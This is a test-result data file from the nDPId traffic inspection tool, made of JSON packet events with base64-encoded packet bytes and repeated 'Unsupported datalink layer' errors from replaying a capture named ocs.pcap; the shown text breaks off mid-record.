-00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDlQABABoHwwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlxyMAAAEBCAoANYNURwX+CwEBBRLe5lxQ3uZ9\/97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":71,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788481} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDmQABABoHvwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlwbcAAAEBCAoANYNURwX+CwEBBRLe5lxQ3uaDa97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":72,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788512} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlqQABABgmAwKi0ArL40DaPSAG7xoy7Gjpn4mWAEAEShVwAAAEBCAoANYNXRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":73,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788518} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlrQABABgl\/wKi0ArL40DaPSAG7xoy7Gjpn59GAEAE\/f8MAAAEBCAoANYNXRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":74,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788521} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":74,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlsQABABgl+wKi0ArL40DaPSAG7xoy7Gjpn7T2AEAFseikAAAEBCAoANYNYRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":75,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788522} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDltQABABgl9wKi0ArL40DaPSAG7xoy7Gjpn7\/mAEAGYd0EAAAEBCAoANYNYRwX+ag=="} 
-00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":76,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788523} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDnQABABoH2wKi0ArL40DbC2QBQ64tGkd7mVuSwEADlq9QAAAEBCAoANYNYRwX+CwEBBQre5lxQ3uaOQw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":77,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788535} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFaQABABqbiwKi0AhcV5seZXwG7KAKpCVpZO+mAEAHi2dsAAAEBCAoANYNal2cLGA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788595} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":79,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788603} 
-00369{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWSFbQABABqa8wKi0AhcV5seZXwG7KAKpCVpZO+mAGAHi+l8AAAEBCAoANYNgl2cLGBUDAQAgnrF5ZZ6bLaNIscD09wErYOXiKOcK3EQR+1eSLnFX2LU="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":80,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788604} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFcQABABqbgwKi0AhcV5seZXwG7KAKpLlpZO+mAEQHi2a8AAAEBCAoANYNgl2cLGA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":81,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788632} -00743{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":366,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":366,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABbjluQABABghCwKi0ArL40DaPSAG7xoy7Gjpn7\/mAGAGYPNEAAAEBCAoANYNjRwX+ahYDAQEGEAABAgEAMMRmTPsen+2AYa94093E2Vq7hcxeYwMqQEqPqyXCgdPzR6vuUKQz6pVdmHwa79xuMQ8retZcWvvlTKI\/+1N9Gw\/OaFaKf1XNyjpOCZDOqZNC1QfAdJVPLISbx5mvxfQvXpOc3phEJ8CTUkKMOoQ3aJQOpUeTUETGoqRungcuMX0flcpp4eLJBf3TOwuHdOuI3rMCc2MG4Jycx7Z3cRdXP2ZRxnQsrduzGirfTjwCtcfz8aDtqXVLuKvVuhGzRT9h40LMwEboDGuD3+F7F3v0NqpNGHY9wn\/cN+17s3inRcJFU7O9HkHw3yh1R32L3CbW99WKgFGgvhRhnMJ2UVhZWxQDAQABARYDAQAkNvXgz7fHCqM2dlRB6bX8n2EuyIc7MhCF9s2YUBddilHfdTrE"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":82,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788669} 
-00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":82,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDoQABABoIBwKi0ArL40DbC2QBQ64tGkd7mjkOAEAESUisAAAEBCAoANYNnRwX+kg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":83,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788688} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlvQABABgl7wKi0ArL40DaPSAG7xoy8VDpn8CiAEAGYdZoAAAEBCAoANYNpRwX+lw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":84,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788737} 
-01206{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":702,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":702,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACvjlwQABABgbwwKi0ArL40DaPSAG7xoy8VDpn8CiAGAGY31IAAAEBCAoANYNuRwX+lxcDAQKFLzhkliTvJmiVa3YhExR3D9MDAzF9+33c1h+p25FVP\/QC\/yJASItBOx3fMBZbY6pcwGnm\/8PoxXcRBCTkxJ3OCUHArkSHkNab4QGuPm1FJWeb9HHTA49\/hpdu8FmfXT2x0b3oWNDQYT8WZmStF+K3HEbBNiYKTlAsd\/koYM7SLoU2jQc+B+WSAhSoPqkS85DHiVbsA2hzCgOumpL6QkDkUYTE93eMbY6HO3uunibkAw8pkjzbe7rrpyy07rcdZT4r0NzB\/wc\/0H2J65B+d914bi23jOUGOBm8VAeGAfwqGaTQze1ihF2zuTXIzK7Thoi7SqCuqcFCByNKgJDlrLwW188DP0a492JbHJ+XFSUrF7xChYQP6V80FFq\/7XHj0dWhLOPDM486p0lyO52Wd2ip5i\/uUgSnQ3zhKGKDZv9RywiqfxJwH7iohk2K8AOui0QEIDSN3rFDSCenR9+SGjMg9ZkJs\/8WxklNPs8RUyy91Vi13o\/ziNLgw4i5dDrX\/vBO+TyiZ71Pq21doqxiW3nOJA5SRMR47t108HEfuQk2n7zXSfLEREC1FCQMZFH5eyh2aLLS4\/f3JCdmwyzC0tTh4V7kYhxuRndbQj3AJEw2LzlZhGv2fUVTNiMmN5+chMr59vrozlkDrEWznTayNnrsE69E9r6RV2o24IZSEJx\/WTAzx9DQQD1\/aWRrc3CUvaQLY+QKUkMHG14x2Add1Z5fTpbLemNOXS3DGMBGHgDR\/goXIlipPA5FUs95nuh\/0Xk08hBpEhJiUI+nI3\/TT+0xhhD0EHwEcwCz\/EFSmSnRcjQC1sJU9fD42Th6pvQLnU99Bua2FpItOa2gF0aqrxRgi6090OFj"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":85,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788739} 
-01162{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":667,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":667,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACmzlxQABABgcSwKi0ArL40DaPSAG7xoy+3jpn8CiAGAGYptEAAAEBCAoANYNuRwX+lxcDAQJiKOTPFbSB4Jg790Ua+XImPPQ60FyTYwPHLmrAbl33MPZn88jonG6eefW\/w8Rw9YqdGuqNYwOkviljbPa+zoX\/ZKY6k9Jn7liLFSo3Od3N7BSpbNbcG1Kpg7OxUICaZ2maEViZEYv9v3By8kF9UcHK+FKBm+DjBibOue25pxD4GkcS7rzEL8PmSj5IwYfDl\/u8UnC9IG0wAh4K4LlelesH7MBifuirR9CHNiZaHt\/0BeIfMS\/S+jxwV\/q5reDLX+I5YDDLET5aaUagd0r0LsbX4tBDJ404JcsMRW4YTulXeRllSSAHaOjo32h9Q+WCHNNjZgq9Qxe3WXwU\/CUiKK3AZ2MsJD\/NHF0f5GP\/uLGrpFN32SHXaHfUd01zsHmU6DWEpk+qG+dWV9Tcj7A5pZuqDcXKC+GCxX386fRTPG4mO3ueioq3+dE8ZGCwfL2DFQgSY1CcZ2qho0s1MZAkQ2Wz\/yAqxyl0xCkZdnVgq8y4O0u7AmM2addeuOMjZhop+iYkC8okrenaP9qUBaxsp2rFpyu+Kp9\/1updhypVQsqZ8ix0oT3hIGcCRjQuNNgN6SaEVzTWwavb7sRIhkPo9\/rXJeMiIAwsxlLen8zj0yk\/dg6cQx4HD0Pk4ifpIqlPYRMNEJDyQNDsLinAvU5Y0gsnLtMEIeHT8IcouklYQcBPdqMDdqE3GPT88dZdAVnpYVyqwtNdv94WNG\/ivWIUmfyC1e8TiINcQ6\/Ref\/WBZJHn9Wz+SVibx9hglnfeU\/\/z1iqUnADQdY91uiDm0xa59wVRYE\/HnY+AyT4aHizWB4qxgyXsw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":86,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788760} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDpQABABoH0wKi0ArL40DbC2QBQ64tGkd7mjkOwEAESMXIAAAEBCAoANYNwRwX+kgEBBQre5pOv3uaZGw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":87,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788766} 
-00305{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":40,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":40,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAKAAAQABABshIwKi0AhcV5seZXwG7KAKpLgAAAABQBAAA0Q0AAA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":88,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788767} -00305{"packet_event_id":1,"packet_event_name":"packet","packet_id":88,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":40,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":40,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAKAAAQABABshIwKi0AhcV5seZXwG7KAKpLwAAAABQBAAA0QwAAA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":89,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788831} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDqQABABoHzwKi0ArL40DbC2QBQ64tGkd7mjkOwEAESK\/8AAAEBCAoANYN3RwX+kgEBBQre5pOv3uaehw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":90,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788908} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDrQABABoHywKi0ArL40DbC2QBQ64tGkd7mjkOwEAESJosAAAEBCAoANYN\/RwX+kgEBBQre5pOv3uaj8w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":91,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788909} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlyQABABgl4wKi0ArL40DaPSAG7xozBRTpn8qGAEAHDbb8AAAEBCAoANYN\/RwX+xw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":92,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788972} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDsQABABoH9wKi0ArL40DbC2QBQ64tGkd7mo\/OAEAE\/O+cAAAEBCAoANYOFRwX+2w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":93,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788975} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":93,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDtQABABoH8wKi0ArL40DbC2QBQ64tGkd7mqV+AEAFsNk0AAAEBCAoANYOGRwX+2w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":94,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789056} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":94,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDuQABABoH7wKi0ArL40DbC2QBQ64tGkd7mrsuAEAGaMJsAAAEBCAoANYOORwX+6w=="} 
-00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":95,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789058} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":95,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDvQABABoH6wKi0ArL40DbC2QBQ64tGkd7mtDeAEAHHKwAAAAEBCAoANYOORwX+7Q=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":96,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789144} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":96,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDwQABABoHtwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHvl8AAAEBCAoANYOWRwX+7QEBBQre5rmj3ua\/Dw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":97,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789144} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDxQABABoHswKi0ArL40DbC2QBQ64tGkd7mtDewEAHHuPMAAAEBCAoANYOWRwX+7QEBBQre5rmj3ubEew=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":98,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789212} 
-00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDyQABABoHrwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHs4AAAAEBCAoANYOdRwX+7QEBBQre5rmj3ubJ5w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":99,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789244} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":99,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDzQABABoHqwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHrhEAAAEBCAoANYOgRwX+7QEBBQre5rmj3ubPUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":100,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789287} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":100,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD0QABABoH1wKi0ArL40DbC2QBQ64tGkd7mz1OAEAH0D2UAAAEBCAoANYOlRwX\/KA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":101,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789672} 
-01334{"packet_event_id":1,"packet_event_name":"packet","packet_id":101,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":792,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":792,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQADGDlzQABABgaTwKi0ArL40DaPSAG7xozBRTpn8qGAGAHDOyQAAAEBCAoANYPLRwX+xxcDAQLfQJSrr\/pzjrd7l3oz7cxgDJv4mJh\/+5PthE\/bje7dr41MpoKwhYjLn46Nve6iuvH1AUr8S9t+0dVBauflytgHHJQl4OKHXoSUTCCx\/8PJWKyahIPCye+c6DXzYCnzfYc\/Xtw45ya7llml6SVxOK0wuTK\/L5cfdaQseqwjA\/QI\/zEum1c6qu1Ut0UaNcJDtQ0GQ5\/w2duhULU6tOO9\/2lSDQui\/5Op0cfK+2rXd1A5oOgoK5NYIhh0iu0tUmIXKBZZwI85EU8LIiqsJADGbP4+ScmcO3aqobp8hlsSICkb3vGHf2FeAsXjNtUWuAZgvn0Uc6waDihGHR0TTrm92b4tGrrGXK7yCTlXHFcgJpykqXKRPI+VuTcnNkNYn0a+64\/\/tVUzCiNooNYdTq\/GyEGJYHlwiXztwkPUlcZbUTaNJwK9OjzQZHdQvNcTD7QtTmcHpDsap8UAohr7XIKbt1M\/lCp+8EQUPCwgztEz0PqNI9fM5SYsvvs9e3G2LujClrS\/k\/SiSMSPer855BP8WHJYlrqECuyVhsmZgzyeE3hkYOS3hVCGe4u+7W6pLMrM+y0lRtNhrsY7XOXI+UpgfB4bgaeWo4T5VsZimtjTOuorB5\/mZxMUktU4asZVpqnWTqfFMZE7KwwJvML6GXd6GfosO3tUPrTR\/lgrWOXgAzq5DCuH29AGkhSPidxT+5HcsArYadpj4KWYHYTWTQkd3sW8OHcH3Wd\/pUkNlgQrAoMSzM7OqG8+Bw9O10vzP7VmoZCzeTW6NdB8a6O8VAe45\/fprtJVurNVsDxJekExY0VqyilIG4uG1Rhb8N6RRucqyxKptmx6bL311CM07uSE\/ddAIAWCwvnXYUdLHUXgCVMjXIIsRxMwkh5zE2dGq4PhiQv\/2\/VHMe3bEYkcd8NFp5ePNTbyRHMvSA8Cknt0K0d6Jf0\/iDCURDCG4Ogyg5VALrsqMu5S\/+fFtMQ5OoS7fCBs"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":102,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789673} 
-02203{"packet_event_id":1,"packet_event_name":"packet","packet_id":102,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1440,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1440,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFoDl0QABABgQKwKi0ArL40DaPSAG7xozEKTpn8qGAEAHDQgMAAAEBCAoANYPLRwX+xxcDAQgUoS2Q4xxYqgiBr9VYqCdqLlk9zRLBnJxU97XO3zSo9FBRNExBlmqfxTwXukcVOwyiCnKnFZPokPMB3YYA8MoGsli6UXehe6wcqhjroppMMFSHu79btS6vrPZzIhWaMATGtMvR5rN2sJ09EwFxDrGXOW8aEXPkjJQ+lFxnfVOt5Xh+JJOGnKDH1ZRM+993qH+04sHYPGUQfsVN5keWEoCPMDSrTN\/s78PbUoIHXkFiJHJy8rlMR657aFCY5QH\/aeNaM\/HVBxHs1GFuTwh+Q6JaGHUe\/IFA4+A2KLPZsFMf1jUwkwsE03adAnv596hOZN7x25Xk9c11dbulTwSxuaSPXExHY4d6BRplthTotFuyfkCG0JsG0LOZwZ\/89DH7o3Xd55B3yTqUqVKc1NxxvyHdIYm5tOD\/nAGcBp\/eN77ZhlyJPVNnrniMmgs\/r5IfLoJN5Itt\/dVbTvbgJrqp1BNHIe8NK+KDnxnr8yj3vCIRIUe4\/lZegyp5ETkT8OI9vqQK3UbFnJ0riskolYtv1\/N3eIKsAaLKjOPAN3pHs\/EdEyISypsAimvmLT1oocBzHw540Kd3JTVmOWGv0hnmPfZuP\/4tl9iHKPEtfBH5pbMsaHcdK4GGRRSiCXT7dPwQBqv15khQ4J1xOQlzIyqPqhtKqkkVbOZdxHBT1K\/WSTKvo\/DBW2wJmONU6iPKzbnKmrfMeXjUKvZ+W4BbOh+zJwiOMbF0YRxzeHpmlh8N0gt3s2+cTQEZ4AA6\/suTmnISAB8zBNrWkvLOWgY1GRDf1QX+eFIzGj1RxMS9PMfvRyF5c9R6T66GsxBNTPnJTAGJqU\/NUn2\/skN9txXKk48vktFzQDyFuIzKE4w2i15xqRrHOPKfP72REvXppc7ukOkn4FLux2nnZ6TapR8u1zMnS+6x4SMGR0+frW+093K9IokclZ6V+0HR2kcamJxfnoH3v2CQ3GTMDuYtcaqOuaNeokpH2JIV0Ibfz7Do1PkOHy0RMlOAovHD8Jx4CFp28SXlW1sMw16IS4FsfOMzE3TLzWEeDoERZ8ZwU1zr+8G\/+Y59ZQLrhJZF2dLDsyVfxc6vJoNcGKp1C7XoYSZJocFdY6wNTGy594uWOuiLKkkeWo2i+tiVURgyKLTNRMy08T1A\/GYEQ1NbxbtFpAP\/z\/y3mCXpDveAIn8qz\/Cylxs8n\/ALpHBW13Ff2vh4LvYuOOhQW1ZC6Phe79pvxCwI8Z4mFpiFEaYVs+VrFU2oHqXNWiWERKfStC8uufmoXcTMoxBE2BABdtWD+u0T3dqOrQoafWD3tsc8RU66e6tAAERQ3ua7I2cu1BIWeC26Mnsifhdg8qjyI6hV9dqyveUfA0qLGU7qsnfh5NoWRZwzoZUYOKZ0OJa9JPx83p7PALTBoQnImL1Khd6dUjd3v+H3GJUe7zY2v6NrN5D5v+urG8MMp025IobLutrCgg3Jb0cj1+1MO8bTfNYMBE5qq4VY4sFU7qULKq7kVTEzbZJUNnpOBAe5z\/58bWT3ruriLMpZhBL+rAUU0CzYD87crU4miV\/vPqWEKvetYnz+3GoIhDdBVYxZVJUMbEJfj7g4Lbdv5yiYlvrzq++vHSdaKgWADtaMGOmykB5Q3ksRA9P5WLJ++w\/3
